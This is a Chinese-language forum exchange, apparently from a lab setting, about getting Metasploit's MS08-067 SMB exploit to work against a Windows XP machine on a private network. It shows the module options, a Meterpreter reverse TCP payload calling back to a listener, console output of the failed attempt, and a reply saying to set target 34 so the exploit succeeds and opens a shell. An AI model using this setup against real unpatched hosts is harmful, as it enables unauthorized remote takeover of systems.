MS08-067渗透问题

靶机已经打开445端口,且可以被meta检测到
使用MS08-067设置好之后,一直失败。
具体情况如下:

msf6 exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.88.133   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.88.137   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



使用exploit之后


msf6 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.88.137:4444 
[*] 192.168.88.133:445 - Automatically detecting the target...
[*] 192.168.88.133:445 - Fingerprint: Windows XP - Service Pack 2+ - lang:Chinese - Traditional
[-] 192.168.88.133:445 - Could not determine the exact service pack
[-] 192.168.88.133:445 - Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.

请问各位遇到过同样的事情么,以尝试多次,包括修改了targets 的值

可以在exploit之前,查看攻击模块支持攻击的系统,命令show targets ,找到系统是Windows xp中文简体,它对应的是34我们设置34即可,show targets 34。然后再去exploit。
通过shell进入终端,然后输入chcp 65001解决乱码的问题。